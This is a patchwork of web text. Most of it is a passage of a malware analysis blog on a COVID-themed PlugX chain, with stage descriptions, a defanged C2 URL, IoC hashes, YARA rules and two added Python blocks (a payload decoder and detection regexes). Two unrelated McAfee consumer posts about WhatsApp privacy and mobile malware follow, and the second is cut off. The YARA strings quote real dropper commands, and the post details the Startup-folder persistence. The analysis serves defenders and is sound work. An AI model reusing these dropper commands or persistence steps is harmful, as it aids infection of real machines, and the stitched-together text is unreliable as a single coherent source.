The attacker tried to confuse the analyst by reusing variable names in private or local contexts, but after a couple of minutes you eventually arrive at the following decryption loop.

Decryption Loop

If you run it against the embedded payload you will see a new stage: Stage 4, a brand new script targeting an old version of MS Office.
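The hex-pair decoding plus single-byte XOR described above, as an added example that is not the author's script or the sample's code: a Python decoder that emulates chr(asc(chr("&h"&mid(x,y,2)))), applies the XOR layer and, going beyond the page's key of 0, brute-forces the key byte by ranking candidates. The encoded blob below is constructed for the demonstration, not the real Stage 3 payload.

```python
import binascii
import string

PRINTABLE = frozenset(string.printable.encode("ascii"))
# Substrings an analyst expects to see once a script stage is decoded; used to rank keys.
SCRIPT_MARKERS = (b"WScript", b"Shell", b"CreateObject", b"cmd /c", b"powershell")


def vbs_hex_decode(encoded: str) -> bytes:
    """Emulate the mid(x, y, 2) loop: VBScript reads "&hXX" as a hex number, and the
    surrounding chr()/asc() pair cancels out, so every two hex digits yield one byte.
    Whitespace is ignored because obfuscators often break the blob across lines."""
    cleaned = "".join(encoded.split())
    if len(cleaned) % 2:
        raise ValueError("hex string has an odd number of digits")
    return bytes(int(cleaned[y:y + 2], 16) for y in range(0, len(cleaned), 2))


def xor_single_byte(data: bytes, key: int) -> bytes:
    """The 'encryption' layer: every byte XORed with one key byte (0 in the analysed
    sample, which makes the layer a no-op)."""
    if not 0 <= key <= 0xFF:
        raise ValueError("key must be a single byte")
    return bytes(b ^ key for b in data)


def decode_stage(encoded: str, key: int = 0) -> bytes:
    """Full Stage 3 decode: hex-pair decoding followed by the single-byte XOR."""
    return xor_single_byte(vbs_hex_decode(encoded), key)


def score_candidate(candidate: bytes) -> tuple:
    """Rank a decoded candidate: script markers first, printable ratio as tie-breaker."""
    hits = sum(candidate.count(marker) for marker in SCRIPT_MARKERS)
    printable_ratio = sum(b in PRINTABLE for b in candidate) / max(len(candidate), 1)
    return (hits, printable_ratio)


def recover_key(encoded: str) -> int:
    """Brute-force the XOR key byte for variants that do not use key 0.
    max() keeps the first best candidate, so ties resolve to the lowest key."""
    raw = vbs_hex_decode(encoded)
    return max(range(256), key=lambda k: score_candidate(xor_single_byte(raw, k)))


def encode_stage(plain: bytes, key: int = 0) -> str:
    """Inverse of decode_stage; used here only to build the constructed sample."""
    return binascii.hexlify(xor_single_byte(plain, key)).decode("ascii").upper()


# Constructed sample (not the real payload): a harmless one-liner that only echoes text.
SAMPLE_PLAINTEXT = b'CreateObject("WScript.Shell").Run "cmd /c echo constructed sample"'
SAMPLE_ENCODED = encode_stage(SAMPLE_PLAINTEXT, key=0)

if __name__ == "__main__":
    print(decode_stage(SAMPLE_ENCODED).decode("latin-1"))
    rekeyed = encode_stage(SAMPLE_PLAINTEXT, key=0x5A)
    print("recovered key for re-encoded sample:", hex(recover_key(rekeyed)))
```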

Stage 4

Stage 4 is decoded and run by Stage 3. That stage runs the attacker's copy of MSOSTYLE.exe dropped by Stage 2. It hijacks a method of an old Office 2007 component (Office Data Provider for WBEM, MSOSTYLE.exe).

Sha256: 7f230a023a399b39fa1994c3eaa0027d6105769fffaf72918adebf584edc6fe0
Threat: Persistence and Execution
Ssdeep: 48:zKxYaDzzXRrVHyMqHeIyJwlLGvTlGrbaTFGNT93TPTxGVhTG6TWWWsKj390C9nEm:zKxjDRt+e1sGvJG3aRGNNDtGLLqP5j3N
Description: Set persistence on the target system (Script File)

The following image shows the decrypted and decoded stage. It is quite clear that the attacker wants to gain persistence on the target machine and to run an additional payload by abusing MSOSTYLE.exe (the old component) placed in the "right folder" by Stage 2. Persistence is guaranteed by adding a link called Accessories.lnk inside the Windows Startup folder, pointing to MiZl5xsDRylf0W.tmp.

Powershell Stage 4
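Defensive counterpart to the Stage 1, Stage 2 and Stage 4 tradecraft described above (wildcard copies of System32 binaries to dodge command-line signatures, a folder named like an executable, winrm.vbs driven by a renamed script host out of %tmp%, and a Startup-folder .lnk for persistence), as an added example that is not the author's tooling: Python triage rules run over constructed process and file events that mirror the command fragments quoted in this post. The rule names, regexes and sample telemetry are all assumptions made for the example.

```python
import re
from dataclasses import dataclass
from typing import Dict, List


@dataclass(frozen=True)
class Rule:
    name: str
    pattern: re.Pattern
    rationale: str


# Heuristics derived from the chain described in the post; each is a triage signal, not a verdict.
RULES = (
    Rule("wildcard_lolbin_copy",
         re.compile(r"for\s+/r\s+\S*system32\S*\s+%\w+\s+in\s+\([^)]*\*[^)]*\.exe\)\s+do\s+copy", re.I),
         "System32 binary located via a wildcard and copied under a new name (Stage 1/2)"),
    Rule("wildcard_certutil",
         re.compile(r"\*ertu\*\.exe", re.I),
         "certutil referenced through a wildcard to avoid sandbox signatures (Stage 1)"),
    Rule("exe_named_directory",
         re.compile(r"mkdir\s+\S*\\[\w-]+\.exe\b", re.I),
         "directory created with an executable-looking name such as cscript.exe (Stage 2)"),
    Rule("winrm_vbs_from_temp",
         re.compile(r"%tmp%\\\S+\.exe\s+//nologo\s+\S*winrm\.vbs", re.I),
         "winrm.vbs proxied through a script-host copy living under %tmp% (T1216, Stage 2)"),
    Rule("startup_lnk_persistence",
         re.compile(r"start menu\\programs\\startup\\[^\\\s\"]+\.lnk", re.I),
         ".lnk written into the per-user Startup folder (Stage 4)"),
)


def scan(detail: str) -> List[str]:
    """Return the names of every rule that fires on one command line or file path."""
    return [rule.name for rule in RULES if rule.pattern.search(detail)]


def triage(events: List[Dict]) -> List[Dict]:
    """Keep only events that hit at least one rule, annotated with the matching rule names."""
    findings = []
    for event in events:
        hits = scan(event["detail"])
        if hits:
            findings.append({**event, "rules": hits})
    return findings


# Constructed telemetry (not real logs): process command lines and file-create paths that
# mirror fragments quoted in the post, plus two benign entries to show the rules discriminate.
SAMPLE_EVENTS = [
    {"id": 0, "kind": "process", "detail": r"cmd /c mkdir %tmp%\cscript.exe"},
    {"id": 1, "kind": "process",
     "detail": r"for /r C:\Windows\System32\ %m in (cscr*.exe) do copy %m %tmp%\cscript.exe\msproof.exe /y"},
    {"id": 2, "kind": "process",
     "detail": r"for /r C:\Windows\System32\ %m in (*ertu*.exe) do copy %m %tmp%\cscript.exe\msoia.exe /y"},
    {"id": 3, "kind": "process",  # query argument shortened; the post only quotes its tail
     "detail": r"%tmp%\cscript.exe\msproof.exe //nologo %windir%\System32\winrm.vbs get wmicimv2 -format:pretty"},
    {"id": 4, "kind": "process", "detail": r"cmd /c copy C:\Users\alice\report.docx D:\backup\ /y"},
    {"id": 5, "kind": "file",
     "detail": r"C:\Users\alice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Accessories.lnk"},
    {"id": 6, "kind": "file",
     "detail": r"C:\Users\alice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini"},
]

if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print(finding["id"], finding["kind"], finding["rules"])
```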

Stage 5

Stage 5 is activated by Stage 2, but only after the execution of Stage 3 and Stage 4. Stage 5 is a multi-step session composed of the following additional artifacts: (i) 3UDBUTNY7YstRc.tmp, renamed by Stage 2 to OINFO12.OCX, and (ii) MiZl5xsDRylf0W.tmp, renamed by Stage 2 to Wordcnvpxy.exe. Every artifact is available after the execution of Stage 2 in the crafted folder called OFFICE12 under the user's home directory.

Sha256: 604679789c46a01aa320eb1390da98b92721b7144e57ef63853c3c8f6d7ea85d
Threat: Remote Control, depending on usage
Ssdeep: 536:/4yuzgQ5WugrQ+SccIp1t4xO67y5qHae:gyuzgKwr9bB1t4xO67y5j,
Description: Office Data Provider for WBEM, not malicious but accountable.

MSOSTYLE.EXE is an old Microsoft Office Data Provider for WBEM. Web-Based Enterprise Management (WBEM) comprises a set of systems-management technologies developed to unify the management of distributed computing environments. So it cannot be considered malicious in itself, but it can be considered accountable for the entire infection chain.

Sha256: a49133ed68bebb66412d3eb5d2b84ee71c393627906f574a29247d8699f1f38e
Threat: PlugX, Command Execution
Ssdeep: 768:jxmCQWD+TAxTRh40XfEDDnFt4AczonsT:MC5bw+zosT
Description: A runner plus Command Execution, Plugin Manager

At the time of writing only three AVs detect OINFO12.OCX as a malicious file. Rising AV is actually the only company that attributes it to a well-known PlugX sample. According to Trend Micro, the PlugX malware family is well known to researchers, with samples dating back to as early as 2008. PlugX is a fully featured Remote Access Tool/Trojan (RAT) with capabilities such as file upload, download, and modification, keystroke logging, webcam control, and access to a remote cmd.exe shell.

OINFO12.OCX VT coverage

Static analysis exposes three callable functions: DeleteOfficeData (0x10001020), GetOfficeData (0x10001000) and EntryPoint (0x100015ac).

Both DeleteOfficeData and GetOfficeData look like the classic method of hijacking the old Office parser (take a look here and at figure 3 here) to execute commands.

DeleteOfficeData (0x10001020)
GetOfficeData (0x10001000)

Indeed, if run from its entry point, the DLL executes Wordcnvpxy.exe (as it is the default plugin component). The DLL must be in the same path as Wordcnvpxy.exe, and the latter needs to have exactly that filename (imposed by Stage 2 and hard-coded into the library). On the other side of the coin, if commands are passed through stdin, it executes the given parameters as commands.

No Input Commands, Wordcnvpxy execution

The following image shows when parameters are given and Commands are executed.

Commands Execution

Finally we have Wordcnvpxy.exe, which is run in the same stage (Stage 5) by OINFO12.OCX. At the time of writing it is well known to static engines; it looks like a standard backdoor beaconing to its own command and control, installed as a PlugX module.

Sha256: 002c9e0578a8b76f626e59b755a8aac18b5d048f1cc76e2c12f68bc3dd18b124
Threat: PlugX, Backdoor
Ssdeep: 1536:9/dlJMLIU94EYayTdHP6rUkn16O41yWCzB:93JsZxePUAFgWCz
Description: Probably one of the last stages, beaconing VS C2 and executing external commands

Wordcnvpxy VT coverage

The sample uses dynamic function loading, avoiding static enumeration and guessing. It collects information on the victim (PC name, username, IP location) and sends it to the C2 as a first beacon.

Dynamic Loading function calls

The used Command and Control resolves to the following URL hxxp://motivation[.]neighboring[.]site/01/index.php

Command and Control

Unfortunately the attacker shut everything down a few hours after I started my analysis, so I do not have more information about the network, the commands and additional plugins. However, the overall structure reminds me of the PlugX RAT as nicely described here.

Attribution

According to MITRE (BTW thank you @Arkbird_SOLG for the great suggestions on attribution), PlugX is a well-known RAT attributed to Chinese APTs. APT27 (aka Emissary Panda) is the most notable APT group that has used it. Moreover (thanks to @Arkbird_SOLG), "[…] on China culture, hijacking method are a mandatory knowledge for a job like pentesting […]", which could reinforce the APT27 theory.

UPDATE: I am aware that PlugX is today an open-source RAT, and I am aware that this is not enough for attribution. Indeed the intent of the title is to cast doubt on that attribution through the "?" (question mark). On one hand PlugX has historically been attributed to APT27, but on the other hand it is public. So it is hard to say Yes or No; for that reason the intent of this blog post is the question: Is APT27 Abusing COVID-19 To Attack People?! It is an open question, not a position.

We are all going through a bad time. COVID-19 has caused many deaths and is threatening entire economies. Please, even if you are an attacker and you profit from your infamous job, stop cyber attacks against people who are suffering this pandemic, and rest. Ethics and compassion should be alive, even behind your monitors.

IoC

  • 95489af84596a21b6fcca078ed10746a32e974a84d0daed28cc56e77c38cc5a8 (original .lnk)
  • f74199f59533fbbe57f0b2aae45c837b3ed5e4f5184e74c02e06c12c6535f0f9 (Stage 2)
  • 9d52d8f10673518cb9f19153ddbe362acc7ca885974a217a52d1ee8257f22cfc (Stage 3)
  • 7f230a023a399b39fa1994c3eaa0027d6105769fffaf72918adebf584edc6fe0 (Stage 4)
  • a49133ed68bebb66412d3eb5d2b84ee71c393627906f574a29247d8699f1f38e (Stage 5/a)
  • 002c9e0578a8b76f626e59b755a8aac18b5d048f1cc76e2c12f68bc3dd18b124 (Stage 5/b)
  • hxxp://motivation[.]neighboring[.]site/01/index.php (C2)

Yara (auto)

import "pe"

rule MiZl5xsDRylf0W {
   meta:
      description = "yara - file MiZl5xsDRylf0W.tmp"
      date = "2020-03-17"
      hash1 = "b578a237587054f351f71bd41bede49197f77a1409176f839ebde105f3aee44c"
   strings:
      $s1 = "%ls\\%S.exe" fullword wide
      $s2 = "%XFTpX7m5ZvRCkEg" fullword ascii
      $s3 = "SK_Parasite, Version 1.0" fullword wide
      $s4 = "DINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPAD" ascii
      $s5 = "DINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADD" fullword ascii
      $s6 = "SKPARASITE" fullword wide
      $s7 = "default" fullword ascii /* Goodware String - occured 709 times */
      $s8 = "59xf4qy-YXn-pkuXh=x3CXPHCcs3dXFlCtr3Cc4H4XufdZjmAZe3Ccxuibvm592g" fullword ascii
      $s9 = "SK_Parasite" fullword wide
      $s10 = "KOeS5OEThZjnYazMJ7p3Ccx-ptAMKuUMLlPEID2=Kn4XLqTM4WhSAKAHAbRMxXsa5Xj-AazEAqzEAqgg" fullword ascii
      $s11 = "ZXsDCcsTA80HdkET" fullword ascii
      $s12 = "8c9h9q9" fullword ascii /* Goodware String - occured 1 times */
      $s13 = "<&<,<6<<<F<O<Z<_<h<r<}<" fullword ascii /* Goodware String - occured 1 times */
      $s14 = "5$5@5\\5`5" fullword ascii /* Goodware String - occured 1 times */
      $s15 = "About SK_Parasite" fullword wide
      $s16 = "1/2A2o2" fullword ascii /* Goodware String - occured 1 times */
      $s17 = "z2bqw7k90rJYALIQUxZK%sO=hd5C4piVMFlaRucWy31GTNH-mED8fnXtPvSojeB6g" fullword ascii
      $s18 = "PQQQQQQWQf" fullword ascii
      $s19 = "Copyright (C) 2020" fullword wide
      $s20 = "1)1p1z1" fullword ascii /* Goodware String - occured 1 times */
   condition:
      uint16(0) == 0x0300 and filesize < 200KB and
      8 of them
}

rule sig_9sOXN6Ltf0afe7 {
   meta:
      description = "yara - file 9sOXN6Ltf0afe7.js"
      date = "2020-03-17"
      hash1 = "70b8397f87e4a0d235d41b00a980a8be9743691318d30293f7aa6044284ffc9c"
   strings:
      $x1 = "var e7926b8de13327f8e703624e = new ActiveXObject(\"WScript.Shell\");e7926b8de13327f8e703624e.Run (\"cmd /c mkdir %tmp%\\\\cscrip" ascii
      $x2 = "&for /r C:\\\\Windows\\\\System32\\\\ %m in (cscr*.exe) do copy %m %tmp%\\\\cscript.exe\\\\msproof.exe /y&move /Y %tmp%\\\\cSi1r" ascii
      $x3 = "ss?Handle=4 -format:pretty&del \\\"%userprofile%\\\\OFFICE12\\\\Wordcnvpxy.exe\\\" /f /q&ping -n 1 127.0.0.1&move /Y %tmp%\\\\48" ascii
      $x4 = "var e7926b8de13327f8e703624e = new ActiveXObject(\"WScript.Shell\");e7926b8de13327f8e703624e.Run (\"cmd /c mkdir %tmp%\\\\cscrip" ascii
      $x5 = "p %tmp%\\\\cscript.exe\\\\WsmPty.xsl&%tmp%\\\\cscript.exe\\\\msproof.exe //nologo %windir%\\\\System32\\\\winrm.vbs get wmicimv2" ascii
      $s6 = "/b %tmp%\\\\2m7EBxdH3wHwBO.tmp+%tmp%\\\\MiZl5xsDRylf0W.tmp \\\"%userprofile%\\\\OFFICE12\\\\Wordcnvpxy.exe\\\" /Y&\\\"%tmp%\\\\2" ascii
      $s7 = "6W.tmp \\\"%userprofile%\\\\OFFICE12\\\\MSOSTYLE.EXE\\\"&move /Y %tmp%\\\\3UDBUTNY7YstRc.tmp \\\"%userprofile%\\\\OFFICE12\\\\OI" ascii
      $s8 = "48-covid-19.pdf\\\"\",0);" fullword ascii
      $s9 = "e7926b8de13327f8e703624e" ascii
   condition:
      uint16(0) == 0x6176 and filesize < 2KB and
      1 of ($x*) and all of them
}

rule sig_3UDBUTNY7YstRc {
   meta:
      description = "yara - file 3UDBUTNY7YstRc.tmp"
      date = "2020-03-17"
      hash1 = "a49133ed68bebb66412d3eb5d2b84ee71c393627906f574a29247d8699f1f38e"
   strings:
      $x1 = "cmd /c notepad.exe" fullword ascii
      $x2 = "dllexec.dll" fullword ascii
      $s3 = "cmd /c calc.exe" fullword ascii
      $s4 = "Wordcnvpxy.exe" fullword ascii
      $s5 = "GetOfficeData" fullword ascii
      $s6 = "273<3]3b3" fullword ascii /* Goodware String - occured 1 times */
      $s7 = "2>2K2W2_2g2s2" fullword ascii /* Goodware String - occured 1 times */
      $s8 = "uTVWhY#" fullword ascii
      $s9 = "DeleteOfficeData" fullword ascii
      $s10 = "9#:=:N:" fullword ascii /* Goodware String - occured 1 times */
      $s11 = "URPQQhpB" fullword ascii
      $s12 = "6#6*626:6B6N6W6\\6b6l6u6" fullword ascii /* Goodware String - occured 2 times */
      $s13 = "0#0-030I0N0V0\\0c0i0p0v0~0" fullword ascii
      $s14 = "4.464<4F4L4V4\\4f4o4z4" fullword ascii
      $s15 = "<$=1=;=I=R=\\=" fullword ascii
      $s16 = ">->3>9>O>g>" fullword ascii
      $s17 = "5r5L6T6l6" fullword ascii
      $s18 = "1#1*191>1D1M1m1s1" fullword ascii
      $s19 = ":%:K:Q:{:" fullword ascii
      $s20 = "5(5L5X5\\5`5d5h5" fullword ascii /* Goodware String - occured 4 times */
   condition:
      uint16(0) == 0x5a4d and filesize < 100KB and
      ( pe.imphash() == "abba83cce6a959dc431917a65c5fe7ca" and ( pe.exports("DeleteOfficeData") and pe.exports("GetOfficeData") ) or ( 1 of ($x*) or 4 of them ) )
}

rule sig_20200308_sitrep_48_covid_19________pdf {
   meta:
      description = "yara - file 20200308-sitrep-48-covid-19.pdf.lnk"
      date = "2020-03-17"
      hash1 = "d54d85e3044a05bdafee9f30f7604ee584db91944a5149cc9e0f65f381d85492"
   strings:
      $x1 = "TVNDRgAAAADWPw0AAAAAAEwAAAAAAAAAAwEFAAYAAACtJwAAKgEAABsAAQAT6QsAAgABAC5lDAADAAEARvcMAAEAAQBbOA0AAQABABUTDQAAAAAAAABpUJOkIAAyMDIw" ascii
      $s2 = "jS61LWA3O0LZjbyOyM+Th5BHkL/6NtKERZApZAvWg3QiB7HuGbdfdfIMVwXLDLL9nVOdKplM1TlFlO5ESifhf5tgzpqP9DZt2dfrfTPS/+ZIBLzWJ99g9xXWv91bOiOD" ascii
      $s3 = "wXEkU5x/pIsmFrJtNHbdwG+bszpTRFThzR7p/shOst0DW0ZFKeRdhc/kM7yZKiZM0LkwrconqjQ3wYPZ7MTqq6M91IEWmt0TYiRCrUlVHk0W63x4OVNkZBjH3umhhGbW" ascii
      $s4 = "pUnp5YF5MVzpQVVZGZ3vjyftPMSfwPbgfq+oOoRAAyP6ZnheN9Or9fx8glHHDnXKm8PTjPiuhWhq74VNkEWr+gACxYi/wwj+yrQNyWULOGigcjQQ6ze7Zgp48Bny4X8v" ascii
      $s5 = "1WxCb+ZUBMNpgdQ9VM6Pbm/a3lOho1gNxYjJoenk4InBUmvbgaGreBVEPcshY3J0VUdR35An5FULDqPNKxb5raGeTLpm5548XATYLogWT8E22FhAi+V4d0q3ck1gZSqw" ascii
      $s6 = "GEeEP7OJ3H9kNW2EPOUbKglcK2+vp//RmYt0D/CDulYi6iBikEye9CzxoMuCHgaF8hfJC8DaiQG6B/+lrCggdq54tM4fP9SAqhqBWxW1YVMoKHKrLKhWRlMhlYtoUDbV" ascii
      $s7 = "H/sC8wh3rLxj+gB3VC89yuytzdbGEK3P9U2mmfZGvCPYQlBQgXUXRc8UuNfknuIxjz3CsTDq0QPYPvLj9sHAaK6EoZ3tzZGNYDZBV1szVLoGm4wtS68/jiqvVtmPtKB6" ascii
      $s8 = "fauCRyQIlXVt+r5GYoBBBlfOQqImEkWo6+WlQTSwYS6smIFGhlOgf7AQ4ovS1utu5CdOQaEjc8UwcEx752927tdeRp8xVz4LlZVh/2KEKumMtVfbk1vucomNeqcRsJi6" ascii
      $s9 = "yd2OnvWZvuUQw3aLFzorH9uYxOItXtCmdMmUJP9GKGsdR2VRmYbpkfJ9I5JlbjB2nR28vsrlyOLvHeftPpJaqAb2+eY3ks7r6ewL6JeeS12Gw+8/OrnmTiIrWapEgObL" ascii
      $s10 = "RhSzuRlKjfLOgyDj4lOfKOsiZNdxLSHCfbS/kEYl0BslYnQ7YtwYOHZlbWNtSdEUhvb4kKsY/+AobmfLilpGotYo3vEBKu8hhbFE1Jrc+GYGxDRue6300wqLbdIKezBr" ascii
      $s11 = "cFHaggy5a+rMrMKC4rKmWdNudM/QWEwp2clOa3lRns1Y4qmtaE5STCmdnj+hITcnvc5eyekbDY568+RUHAxtOr8y3S/vmt9OfY7y/dLNNNLQofyTgt4T7G3abUZ1bNG1" ascii
      $s12 = "VjEg4DubcQ2BtwOwevQAyxdM/FzIuPehNRKJnyLk8q2jPd+UucexECuRJKkRJ0NnnGBEv7sjLuODcKIJHEX8JgyVAcq/DoPewYcsHY8Rh9NeC2fnR6OLLctWM2n53KUn" ascii
      $s13 = "nS8AHUkUzud+yCzW6SCpcW1LiQEWsA8B0zucbgdLVskYWhOLinfePmJ6k6CUgOpcd8fVzMTGRbjV6YyhJjWxlOGgyp7v+q5MGCVbXGwpGM/1xk73XpXhTTPABA+Atm1v" ascii
      $s14 = "KeyEC9M1uHqOE/KCRd902gmpYSK9Ep1sCtzpOqSfNfLHLGoTxu3zjMaEjJ8Dw4/VNYHZo4t5c2CPkSZskDGEYG9rz8HeDf4+Hd3t7y/CyEFD89WV2zsspTFMHnSiyp3t" ascii
      $s15 = "CcCdVZZhyydWDx5BFEKNrLqFB/YFtIaCbuk52NxcwOWQ4muYqVQDbXvcIi/mrR2bXPO1koVLNJbK28cDGFSGXFGg9YXl+YxZkEYe14fqauAf3E/rZcpNs5kCKmv5y5W4" ascii
      $s16 = "cnhkpPaBto41NCLi/eWl360SSHxRUUZsmZ2dnY3wlvb2T+Nu2mRSpYtAlikPNxFZa8nOIodAkeyEVi1SsSRQngbhvRq5LpJOPh4ldQ1N+56agooQr+W0oFa2KXNsEetV" ascii
      $s17 = "FIwtpdre2Wmnc21tda09FKpZefVL43grfymCTd5K56sLOgontwiwYn1nYgVnGJPP/LVQ4JKa1rFFA3Y0HSBBKwuTrFmOAdIJwhoTUrZzBokdMSD931UQuVHTXaMnRz10" ascii
      $s18 = "VGO9VokrQADVECqvw3oyurkmSN5/sSpYnNf7Wi/ECAUmGg/S5qDAyFTPbyfhqOI58HyFRC846KnQDdn72pSAno4kdaeMLOelzq3b6bXV5l2VPj4wQfNl0GZCuJMn7LTR" ascii
      $s19 = "TXxf/IllO3bWzFUJaAMLlRUnogcNa2x0VENzHR6cEaOx79lHSoQxYVHwSUfmEjZoZ2pROh7H1UCMdmJR/3wD2YF9x4MoF5dJQiiAhb4NH9781LGhwW6JqODySrvw3EGT" ascii
      $s20 = "lTvLNEAvdSOFqYwbinqsSVNmUDf6zYKeYafaDjqm8gebMsHURHBynktlSzDsefxSefP1Q1h15TkkR3m/j6/umso0tMFngezzB4SUvUoqb1BMzfPSHU+4EpvSvStNQjKe" ascii
   condition:
      uint16(0) == 0x5654 and filesize < 3000KB and
      1 of ($x*) and 4 of them
}

rule sig_486AULMsOPmf6W {
   meta:
      description = "yara - file 486AULMsOPmf6W.tmp"
      date = "2020-03-17"
      hash1 = "604679789c46a01aa320eb1390da98b92721b7144e57ef63853c3c8f6d7ea85d"
   strings:
      $x1 = "<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\"><assemblyIdentity version=\"1.0.0.0\" processorArch" ascii
      $s2 = "emblyIdentity type=\"win32\" name=\"Microsoft.VC80.CRT\" version=\"8.0.50608.0\" processorArchitecture=\"x86\" publicKeyToken=\"" ascii
      $s3 = "0Mscoree.dll" fullword ascii
      $s4 = "<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\"><assemblyIdentity version=\"1.0.0.0\" processorArch" ascii
      $s5 = "t:\\misc\\x86\\ship\\0\\oinfop12.pdb" fullword ascii
      $s6 = "_tWinMain (Ship) commandline='%s'" fullword ascii
      $s7 = "PrintPostScriptOverText" fullword wide
      $s8 = "InstallLang" fullword wide /* base64 encoded string '"{-jYKjx' */
      $s9 = "re=\"X86\" name=\"OINFOP12.EXE\" type=\"win32\"></assemblyIdentity><description>OInfo</description><dependency><dependentAssembl" ascii
      $s10 = "SetOfficeProperties -- PublisherPageSetupType" fullword ascii
      $s11 = "\\ship\\0\\oinfop12.exe\\bbtopt\\oinfop12O.pdb" fullword ascii
      $s12 = "GetOffice type for '%S'" fullword ascii
      $s13 = "TemplateCount" fullword wide
      $s14 = "Win32_Word12Template" fullword wide
      $s15 = "'OInfoP12.EXE'" fullword ascii
      $s16 = "Queued_EventDescription= " fullword wide
      $s17 = "COfficeObj::Initialize, user='%S', namespace='%S'" fullword ascii
      $s18 = "TabIndentKey" fullword wide
      $s19 = "Win32_WebConnectionErrorMessage" fullword wide
      $s20 = "OInfo12.OCX" fullword wide
   condition:
      uint16(0) == 0x5a4d and filesize < 300KB and
      ( pe.imphash() == "3765c96e932e41e0de2bd2ed71ef99ad" or ( 1 of ($x*) or 4 of them ) )
}

WhatsApp Security Hacks: Are Your ‘Private’ Messages Really Ever Private?


WhatsApp is one of the largest instant messengers and is considered by many a social network of its own. So, continuing our app safety discussion, we're diving into some of the top security hacks and questions many WhatsApp users and parents may have.

But first, what’s a security hack? In short, it’s an attempt to exploit the weaknesses in an app, network, or digital service to gain unauthorized access, usually for some illicit purpose. Here are just some of the concerns WhatsApp users may have and some suggestions on boosting security.

WhatsApp Hack FAQ

Are WhatsApp conversations private?

Yes — but there are exceptions. WhatsApp offers greater privacy than any other app thanks to end-to-end encryption, which scrambles messages to ensure only you and the person you're communicating with can read your messages or listen to your calls. Here's the catch: WhatsApp messages (which include videos and photos) are vulnerable before they are encrypted and after they are decrypted if a hacker has managed to drop spyware on the phone. Spyware attacks on WhatsApp have already occurred. Safe Family Tip: No conversation shared between devices is ever 100% private. To increase your WhatsApp security, keep sensitive conversations and content offline, and keep your app updated.

Can anyone read my deleted WhatsApp messages?

A WhatsApp user can access his or her own deleted messages via the chat backup function that automatically backs up all of your messages at 2 a.m. every day. WhatsApp users can delete a message by using the Delete for Everyone button within an hour after sending, though it's not foolproof. Here's the catch: Anyone who receives the message before it's deleted can take a screenshot of it. So, there's no way to ensure regrettable content isn't captured, archived, or shared. There are also third-party apps that will recall deleted messages shared by others. Another possibility is that a hacker can access old chats stored in an app user's cloud. Safe Family Tip: Think carefully about sharing messages or content you may regret later.

Can WhatsApp messages be deleted permanently?

Even if a WhatsApp user decides to delete a message, it’s no guarantee of privacy since conversations are two-way, and the person on the receiving end may screenshot or save a copy of a chat, video, or photo. On the security side, you may delete a message and see it disappear, but WhatsApp still retains a “forensic trace of the chat” that can be used by hackers for mining data, according to reports. Safe Family Tip: For extra security, turn off backups in WhatsApp’s Settings.

How can I secure my WhatsApp?

It’s crucial when using WhatsApp (or any other app) to be aware of common scams, including malware, catfishing, job and money scams, spyware, and file jacking. To amplify security, turn on Security Notifications in Settings, which will send an alert if, for some reason, your security code changes. Other ways to boost security: Use two-step verification, never share your 6-digit SMS verification code, disable cloud back up, and set your profile to private. Safe Family Tip: Install comprehensive family security software and secure physical access to your phone or laptop with a facial, fingerprint, or a passcode ID. Don’t open (block, report) messages from strangers or spammers. Never share personal information with people you don’t know. 

How do I delete my WhatsApp account from another phone?

To delete a WhatsApp account, go to Settings > Account > Delete My Account. Deleting your account erases message history, removes you from groups, and deletes your backup data. According to WhatsApp, for users moving from one type of phone to another, such as from an iPhone to an Android, and keeping the same phone number, your account information stays intact, but you won't be able to migrate messages across platforms. If you're not keeping your number, you should delete WhatsApp from your old phone, download WhatsApp to your new phone, and verify your new phone number. Upgrading the same phone type will likely include options to migrate messages. Safe Family Tip: Before you give away or exchange an old phone, wipe it clean of all your data.

How do you know your WhatsApp is scanned?

WhatsApp users can easily sync devices by downloading the WhatsApp web app and activating it (Settings > WhatsApp Web/Desktop). Devices sync by scanning a QR code that appears on your laptop screen. You know your device is scanned when you see the green chat screen appear on your desktop. Safe Family Tip: It’s possible for a person with physical access to your desktop to scan your QR code and to gain account access. If you think someone has access to your account log out of all your active web sessions in WhatsApp on your mobile phone.

How long are WhatsApp messages stored?

According to WhatsApp, once a user’s messages are delivered, they are deleted from WhatsApp servers. This includes chats, photos, videos, voice messages, and files. Messages can still be stored on each individual’s device. Safe Family Tip: The moment you send any content online, it’s out of your control. The person or group on the receiving end can still store it on their device or to their cloud service. Never send risky content. 

How secure is WhatsApp?

There’s no doubt that end-to-end encryption makes it much more difficult for hackers to read WhatsApp messages. WhatsApp is more secure than many other messaging apps, but it is not 100% secure.

Is it true that WhatsApp has been hacked?

Yes. Several times and in various ways. No app, service, or network has proven to be unhackable. Safe Family Tip: Assume that any digital platform is vulnerable. Maximize privacy settings, never share risky content, financial information, or personal data.

Is WhatsApp safe to send pictures?

Encryption ensures that a transmission is secure, but that doesn’t mean WhatsApp content is safe or that human behavior is predictable. People (even trusted friends) can share private content. People can also illegally attempt to gain access to any content you’ve shared. This makes WhatsApp (along with other digital sharing channels) unsafe for exchanging sensitive information or photos. Safe Family Tip: Nothing on the internet is private. Never send or receive pictures that may jeopardize your privacy, reputation, or digital footprint.

WhatsApp isn’t the only popular app with security loopholes hackers exploit. Every app or network connected to the internet is at risk for some type of cyberattack. We hope this post sparks family discussions that help your kids use this and other apps wisely and helps keep your family’s privacy and safety online top of mind.

The post WhatsApp Security Hacks: Are Your ‘Private’ Messages Really Ever Private? appeared first on McAfee Blogs.

Is Mobile Malware Playing Hide and Steal on Your Device?

Over the years, we’ve all grown accustomed to using our smartphones and mobile apps to support our lifestyles. We as consumers have developed expectations of how devices can enhance our everyday lives, from online banking transactions to handling work correspondence on the go. But as we become more reliant on our smart devices and apps, hackers use this dependency as an opportunity to gain unwarranted access to our personal data. According to McAfee’s latest Mobile Threat Report, hidden apps are the most active mobile threat facing consumers, generating nearly 50% of all malicious activities in 2019. Let’s dive into these mobile threats and how they could potentially impact your life.

Don’t Let These Mobile Threats Commandeer Your Device

LeifAccess

